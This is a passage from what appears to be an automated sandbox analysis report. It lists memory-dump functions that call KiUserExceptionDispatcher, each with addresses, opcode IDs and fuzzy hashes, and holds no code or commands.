                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 82c1a809b985f537eece744f6a61af7f30147bd06b89456e9a2ad159d082f5c4
                        • Instruction ID: aac7fe748f8c464ccf90ea7aad2b24051e0f9cad5fe3524ffbf4320cf2839f5a
                        • Opcode Fuzzy Hash: 82c1a809b985f537eece744f6a61af7f30147bd06b89456e9a2ad159d082f5c4
                        • Instruction Fuzzy Hash: 9AC1A174E00218CFDB64DFA5C994BADBBB2BF89304F2090A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580A1F8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580A2C3
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: c2682e4cda2ee3961b9e1fd4e3726329cba898d8293c70194f201bfe9b36f749
                        • Instruction ID: 0f60bb576d99bcfd3bd91794106e8b7bcf9567dd929607c4fe7138e92b71267a
                        • Opcode Fuzzy Hash: c2682e4cda2ee3961b9e1fd4e3726329cba898d8293c70194f201bfe9b36f749
                        • Instruction Fuzzy Hash: A2C1A074E00218CFDB64DFA5C984BADBBB2BF89304F2091A9D809AB355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580AF00, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580AFCB
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 20bde3df31ac96675c0c50d713de4cd34c680ae71bb6139fa6077cbc5a462427
                        • Instruction ID: fca56c8a019d4d8e1673a379a3075f63a2242e17a374c2d6f3dc52aad0c0afa0
                        • Opcode Fuzzy Hash: 20bde3df31ac96675c0c50d713de4cd34c680ae71bb6139fa6077cbc5a462427
                        • Instruction Fuzzy Hash: 82C19274E00218CFDB64DFA5D994B9DBBB2BF89304F2090A9D809A7354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580BC08, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580BCD3
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: d8b9d2b74be5e62ee6414ac28ab95722b95e889ff4fadfcc2002f18a135996df
                        • Instruction ID: eea832d9faf3df16800fff5152b354c3c838dc82727adeca983689d7e9c1d482
                        • Opcode Fuzzy Hash: d8b9d2b74be5e62ee6414ac28ab95722b95e889ff4fadfcc2002f18a135996df
                        • Instruction Fuzzy Hash: 60C1A174E00218CFDB64DFA5C984BADBBB2BF89304F2091A9D809AB354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580C910, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580C9DB
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 64964645dfefcff881f67a57d115d6b3e56f9ba469c3fb72f6d6f73ff0a636ab
                        • Instruction ID: 5fcfda30a9b195d470c57c59dac0407b124c0f709405a3576a2d166a73104011
                        • Opcode Fuzzy Hash: 64964645dfefcff881f67a57d115d6b3e56f9ba469c3fb72f6d6f73ff0a636ab
                        • Instruction Fuzzy Hash: A9C1A174E00218CFDB64DFA5C984BADBBB2BF89304F2091A9D809AB354DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580D618, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580D6E3
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 8a751f4a4650af67c44167282dea6d8c4ece18b33f9ba26ed38ff420f7801883
                        • Instruction ID: e80fdc7c47e8eaf66cbec75f0e4b066ef73090c535ebed595f07ffe2a6b845af
                        • Opcode Fuzzy Hash: 8a751f4a4650af67c44167282dea6d8c4ece18b33f9ba26ed38ff420f7801883
                        • Instruction Fuzzy Hash: FFC1A174E01218CFDB64DFA5C984BADBBB2BF89304F2091A9D809AB355DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05808C40, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05808D0B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 57b3abff25c27df86edd9d02e075ab98882d7c139ab20b0f6678d027d6fb7ac8
                        • Instruction ID: ef2c01a0785c8c47262ed22845ee891e8bd73174baee357c1e4de430dabc9758
                        • Opcode Fuzzy Hash: 57b3abff25c27df86edd9d02e075ab98882d7c139ab20b0f6678d027d6fb7ac8
                        • Instruction Fuzzy Hash: BEC1A174E00218CFDB64DFA5D984BADBBB2BF89304F2091A9D809AB355DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05809948, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05809A13
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: a427ef2393095aea8bd8827510349c7c038a2bef2c3615aaf13494f80ccc0669
                        • Instruction ID: 06325add5095e7a95bacbb88d19f1dae69335c83770f17be9cb8e287069f72d5
                        • Opcode Fuzzy Hash: a427ef2393095aea8bd8827510349c7c038a2bef2c3615aaf13494f80ccc0669
                        • Instruction Fuzzy Hash: AFC1A174E00218CFDB64DFA5D994BADBBB2BF89304F1090A9D809AB355DB359D85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580A650, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580A71B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 7efe2576135b1ed746dc8ff88e65d4a62c31c78abbe6043719d7b7768394282a
                        • Instruction ID: 689f9fa057505c7e34f354e31692b7ffbafb834cb7e66500ebad5db385b39ecb
                        • Opcode Fuzzy Hash: 7efe2576135b1ed746dc8ff88e65d4a62c31c78abbe6043719d7b7768394282a
                        • Instruction Fuzzy Hash: 0BC19174E01218CFDB64DFA5D984BADBBB2BF89304F1090A9D809A7394DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580B358, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580B423
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: b9c0f29c61866cf56b359bbd53afb3ec2f4520cb0610e5bcfdb09e69d82a2423
                        • Instruction ID: a29074dc01075082d6d54db0364197594dc98bfe82371962de3a74f38e69b99f
                        • Opcode Fuzzy Hash: b9c0f29c61866cf56b359bbd53afb3ec2f4520cb0610e5bcfdb09e69d82a2423
                        • Instruction Fuzzy Hash: 89C19174E00218CFDB64DFA5C984BADBBB2BF89304F2091A9D809A7355DB359E85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580C060, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580C12B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 2d143b5f158edc56d1a639431d53d06e94f2c6f40b131e65cf69f2580e3bec35
                        • Instruction ID: 77f2682270db672599e50bdce3c4427d6ccd29b5def3b8b98d978ce922edbc2f
                        • Opcode Fuzzy Hash: 2d143b5f158edc56d1a639431d53d06e94f2c6f40b131e65cf69f2580e3bec35
                        • Instruction Fuzzy Hash: B4C1A174E00218CFDB64DFA5C984BADBBB2BF89304F2081A9D809A7355DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580CD68, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580CE33
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 13dedb5b08404448aa8e346fe9ad60c2f8a7bb725623e2794f89950a9ff799c2
                        • Instruction ID: 7f172da2a85261905d58067e025faf86f4b260710bb7899bccc41337d8b8c7fd
                        • Opcode Fuzzy Hash: 13dedb5b08404448aa8e346fe9ad60c2f8a7bb725623e2794f89950a9ff799c2
                        • Instruction Fuzzy Hash: C6C1B174E01218CFDB64DFA5C984BADBBB2BF89304F2081A9D809AB354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580DA70, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580DB3B
                          • Part of subcall function 05807DF8: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 05807F5A
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 7df8512657355e0fe1dc81151d8b43309c0999d21e761a958356af47c7de9598
                        • Instruction ID: a94dc33e8c0d0f94c7c38e2eeebde7fa8ff7e16452fe611388c26e90909afb69
                        • Opcode Fuzzy Hash: 7df8512657355e0fe1dc81151d8b43309c0999d21e761a958356af47c7de9598
                        • Instruction Fuzzy Hash: 68C1A174E01218CFDB64DFA5C994B9DBBB2BF89304F2090A9D809AB354DB359D85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 047FCA0E, Relevance: 1.8, APIs: 1, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 047FCAE4
                        Memory Dump Source
                        • Source File: 00000002.00000002.525444479.00000000047F0000.00000040.00000001.sdmp, Offset: 047F0000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: ab1df65c4498df440ae1f01cbf31aaec074887b5c6756bbbd9afc3b2864b3a78
                        • Instruction ID: 007ca36053731cae1d5cc2cfe98057ef6dbcc3edb6e123a532602fa3e67601e8
                        • Opcode Fuzzy Hash: ab1df65c4498df440ae1f01cbf31aaec074887b5c6756bbbd9afc3b2864b3a78
                        • Instruction Fuzzy Hash: C0D1AF74E01218CFDB54DFA5D984B9DBBB2BF88304F2084AAD909A7364DB35AD85CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058087D9, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058088B3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 5922759fffef3e872edcbe9ee6271b70aee903fe3b22b0d1970e9a3e3e59733e
                        • Instruction ID: b8acd166bea47498e92bf98855d1f0cdc6126cf1da0934974fe188bca5638c14
                        • Opcode Fuzzy Hash: 5922759fffef3e872edcbe9ee6271b70aee903fe3b22b0d1970e9a3e3e59733e
                        • Instruction Fuzzy Hash: EA41E4B1E01208CBEB58DFA6D9546EEFBB2BF89304F20D12AC815BB254DB345946CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580B7A1, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580B87B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 625b99688d6b2e242f8c0dcf466e2697d54008d9bb4e1c3edbc4b2f1186cf040
                        • Instruction ID: ae0469dc8161a64fcfba99aea597a86012dc66a7452ad6cee656053f517d9b9a
                        • Opcode Fuzzy Hash: 625b99688d6b2e242f8c0dcf466e2697d54008d9bb4e1c3edbc4b2f1186cf040
                        • Instruction Fuzzy Hash: 8841D371E01208CBEB18DFAAD9546DDFBB2BF89304F20D12AC815BB298DB355945CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580A1E9, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580A2C3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 1735413fb1dc85142f7d9009e89e29cb6497572d34027833d410c7afd137bf1b
                        • Instruction ID: 7bee7e9000d6bfd923057bd3d952db13ec5a7b696405c78b777a9a3e74997d08
                        • Opcode Fuzzy Hash: 1735413fb1dc85142f7d9009e89e29cb6497572d34027833d410c7afd137bf1b
                        • Instruction Fuzzy Hash: 4641D371E01208CBEB18DFAAD9546DEFBB2BF89304F24D12AC915BB254DB355946CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580908B, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05809163
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 8f1828e71ceff19ca0f5f8f197d123150ddbcc647c852c1ef0c2302d6f3036f4
                        • Instruction ID: 8b9f87ed755e875ce5ca789cadef248d1c89659b85718bd0548e5d84ffe3ceb3
                        • Opcode Fuzzy Hash: 8f1828e71ceff19ca0f5f8f197d123150ddbcc647c852c1ef0c2302d6f3036f4
                        • Instruction Fuzzy Hash: 6D41D270E01208CBEB58DFA6D9546DEBBB2AF89304F24D12AC814BB2A5DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05809D93, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05809E6B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 2e9b5ade015e22be25ecb02646c39a6148cc87f0f7135df2b4f2a2231dcae8b6
                        • Instruction ID: d599f2ade5e6afca86d0b75b435ea52f32937108175da6838767b9e65f19dbf5
                        • Opcode Fuzzy Hash: 2e9b5ade015e22be25ecb02646c39a6148cc87f0f7135df2b4f2a2231dcae8b6
                        • Instruction Fuzzy Hash: 2541D371E05208CBEB18DFAAD9446EEFBB2AF89304F20D12AC815BB355DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580AA9B, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580AB73
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 6f04f092e0d6bd75615db6cfde543219fb2fe4ab13af9fb4d803c929b4750160
                        • Instruction ID: dfc71b365dc3e738be5f4c385ce2ca476defb8cc4b0ee8e8ab133fa8c1360d13
                        • Opcode Fuzzy Hash: 6f04f092e0d6bd75615db6cfde543219fb2fe4ab13af9fb4d803c929b4750160
                        • Instruction Fuzzy Hash: 8D41D270E01208CBEB58DFA6D9546DEFBB2BF89304F24D12AC814BB294DB355946CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 058094E3, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 058095BB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 4aa89ad72ea9def249ae168a487569cfe01d561b134a1730bb0c405026d68ce3
                        • Instruction ID: 3c8313b32178aa8b95308682f9fc82f5520ec5fc9e0331a481a4f44f6ddff082
                        • Opcode Fuzzy Hash: 4aa89ad72ea9def249ae168a487569cfe01d561b134a1730bb0c405026d68ce3
                        • Instruction Fuzzy Hash: 3B41C270E01208CBEB58DFAAD9946DEBBB2AF89304F20D12AC818BB255DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580BBFC, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580BCD3
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 65d145301bc94d543ee0a1b6596bac2b379896300d90391ce43f0d02a4bdd52a
                        • Instruction ID: 61f3909496ca659cd9e0b278ae16e145645ec3e98f4821a14b94a61ce664bbcf
                        • Opcode Fuzzy Hash: 65d145301bc94d543ee0a1b6596bac2b379896300d90391ce43f0d02a4bdd52a
                        • Instruction Fuzzy Hash: BE41E170E012088BEB58DFAAD9546EEFBF6BF89304F20D12AC804BB264DB355945CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 05808C30, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05808D0B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 9a67e3ff345d20483eb7834a359c34336133beea4d00752f83bd00af1673fe3b
                        • Instruction ID: e09dc6d6ff9af173a74d6da2b369f5a35b91e2ee050f78c1db244d190b5b2c3d
                        • Opcode Fuzzy Hash: 9a67e3ff345d20483eb7834a359c34336133beea4d00752f83bd00af1673fe3b
                        • Instruction Fuzzy Hash: F541E570E01208CFDB18DFA6D9446EEBBB2BF89304F20D12AC804BB265DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580B34B, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580B423
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 176a6620ee87fc2794d3b954084838df996ff10c6248021eaa9197fb448e1bed
                        • Instruction ID: a51d2dedd1fba05bf0ecf8a34aac337a6138f3f1b359786617994aa81094c7d6
                        • Opcode Fuzzy Hash: 176a6620ee87fc2794d3b954084838df996ff10c6248021eaa9197fb448e1bed
                        • Instruction Fuzzy Hash: 3941D371E01248CBEB58DFA6D9546EDFBB2AF89304F24D12AC814BB364DB355945CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580C053, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580C12B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 5bddaff40847030f74604ef073bae35d9e22ce4bd53619b149af142e0f3ce3e0
                        • Instruction ID: 53e1f3bebc84dbd0c82763e6183f6cfdb14b6746b923ce69673af6bc925fd171
                        • Opcode Fuzzy Hash: 5bddaff40847030f74604ef073bae35d9e22ce4bd53619b149af142e0f3ce3e0
                        • Instruction Fuzzy Hash: A341D470E01208CBDB58DFA6D9546EEFBB2BF89304F20D12AC815BB264DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580CD58, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580CE33
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 12abc89eab253966431784e67f8151bb32cfdf0d585634420f9a0d0ae6432e7b
                        • Instruction ID: 47ccde8eb9ca010c54b163a8bf87d7117d04e26c33028047d25f4ef5ca0e3c16
                        • Opcode Fuzzy Hash: 12abc89eab253966431784e67f8151bb32cfdf0d585634420f9a0d0ae6432e7b
                        • Instruction Fuzzy Hash: 0641C370E01208CBEB18DFAAD9546EEFBB6AF89304F20D12AC815BB255DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0582457C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05824653
                        Memory Dump Source
                        • Source File: 00000002.00000002.526121837.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: e012336d793f4b463ca9886d98b4d29fc8f94bf1ea2f62f94fc7c6fbb786677c
                        • Instruction ID: 96cb348e864b1d5ae3bf081cc75a650661cff8d5b7aea6f44081aca1dd351b33
                        • Opcode Fuzzy Hash: e012336d793f4b463ca9886d98b4d29fc8f94bf1ea2f62f94fc7c6fbb786677c
                        • Instruction Fuzzy Hash: 2841D471D01218CBEB18DFAAD9546DEFBF6AF89304F20D129C815BB264DB345945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580C4AC, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580C583
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 01cd16712208614917ac844f24a7b3c4eecf4628912160b2605970d9a17b8c11
                        • Instruction ID: bf4b54e0e0110aa3c3797315c3da824f8bd6dfe689a17eeae8197493511998b4
                        • Opcode Fuzzy Hash: 01cd16712208614917ac844f24a7b3c4eecf4628912160b2605970d9a17b8c11
                        • Instruction Fuzzy Hash: 6641E070E012088BEB58DFAAD9546EEFBB2BF89304F20D12AC805BB294DB345945CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580D1B0, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580D28B
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 4654dd3184f2a9756321b42dd0b213d5181803d40f62fa55e5af0991c34b99a7
                        • Instruction ID: 8ca215992cc891124d69a0394bedfda4854c4159c668f9b9d3c6a0e4413d2936
                        • Opcode Fuzzy Hash: 4654dd3184f2a9756321b42dd0b213d5181803d40f62fa55e5af0991c34b99a7
                        • Instruction Fuzzy Hash: F641DF71E01208CBEB58DFEAD9446EEBBB2BF89304F20D12AC805BB294DB355945CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580C900, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 0580C9DB
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 713f079a70b97d53fa9a5a29bedb31d492834efb725b1e52747df3c91a6b80f4
                        • Instruction ID: 1de60d2029ccabefd20d2b8ec4414d100213d472867cb43b73bc00b9b00bd95b
                        • Opcode Fuzzy Hash: 713f079a70b97d53fa9a5a29bedb31d492834efb725b1e52747df3c91a6b80f4
                        • Instruction Fuzzy Hash: 6041D371E01208CBEB58DFAAD9456EEFBB2BF88304F20D12AC815BB254DB355945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580993C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 05809A13
                        Memory Dump Source
                        • Source File: 00000002.00000002.526083113.0000000005800000.00000040.00000001.sdmp, Offset: 05800000, based on PE: false
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 9ce66dbbc9e1cf74b7ab469b4e21f315a99ba852bce759b95f59d8b0c0659b81
                        • Instruction ID: 43612cdab8b6b33ba2ba8ec5518647cf069366fe67019ac511b38a7f5b5404f5
                        • Opcode Fuzzy Hash: 9ce66dbbc9e1cf74b7ab469b4e21f315a99ba852bce759b95f59d8b0c0659b81
                        • Instruction Fuzzy Hash: 3E41C570E01208CBEB58DFA6D9546EDBBF6AF89304F20D129C814BB265DB345945CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0580A640, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
